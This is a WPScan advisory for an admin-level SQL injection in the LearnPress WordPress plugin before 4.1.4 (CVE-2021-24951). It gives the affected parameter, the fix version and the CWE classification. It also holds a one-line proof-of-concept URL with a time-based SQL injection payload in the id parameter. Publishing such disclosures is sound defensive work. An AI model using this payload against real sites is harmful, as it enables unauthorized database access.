WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

LearnPress < 4.1.4 - Admin+ SQL Injection

Description

The plugin does not sanitise, validate and escape the id parameter before using it in SQL statements when duplicating course/lesson/quiz/question, leading to SQL Injections issues

Proof of Concept

(Id needs to start with a valid course/lesson/quiz/question ID): https://examle.com/wp-admin/edit.php?post_type=lp_course&lp-ajax=duplicator&id=149%20and%20sleep(1)%23

Affects Plugins

learnpress
Fixed in version 4.1.5

References

CVE
CVE-2021-24951

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

JrXnm

Submitter

JrXnm

Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified

Yes

WPVDB ID
0a16ddc5-5ab9-4a8f-86b5-41edcbeafc50

Timeline

Publicly Published

2021-11-09 (about 9 months ago)

Added

2021-11-09 (about 9 months ago)

Last Updated

2022-04-11 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin